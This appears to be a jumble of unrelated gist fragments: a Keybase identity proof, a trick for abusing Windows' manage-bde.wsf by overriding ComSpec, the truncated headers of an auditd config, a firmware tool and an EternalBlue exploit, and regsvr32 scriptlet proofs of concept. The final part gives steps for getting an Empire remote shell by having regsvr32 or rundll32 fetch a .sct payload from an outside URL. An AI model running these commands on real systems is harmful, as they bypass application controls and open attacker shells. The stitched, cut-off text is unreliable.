I hereby claim:
- I am coh7eiqu8thaBu on github.
- I am jeromepoggi (https://keybase.io/jeromepoggi) on keybase.
- I have a public key whose fingerprint is C34A C116 1AA2 84AD 2592 1F98 FBB0 84A0 34AF BB17
To claim this, I am signing this object:
I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32.
Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways.
Here are a few examples that you may or may not find useful -
1) Replace ComSpec Variable
set comspec=c:\windows\system32\calc.exe
cscript manage-bde.wsf
# Linux Audit Daemon - Best Practice Configuration
# /etc/audit/audit.rules
#
# Based on rules published here:
# Gov.uk auditd rules
# https://github.com/gds-operations/puppet-auditd/pull/1
# CentOS 7 hardening
# https://highon.coffee/blog/security-harden-centos-7/#auditd---audit-daemon
# Linux audit repo
# https://github.com/linux-audit/audit-userspace/tree/master/rules
/*
 * SEP firmware split tool
 *
 * Copyright (c) 2017 xerub
 */
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Instantiate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
7. Wait for Shell...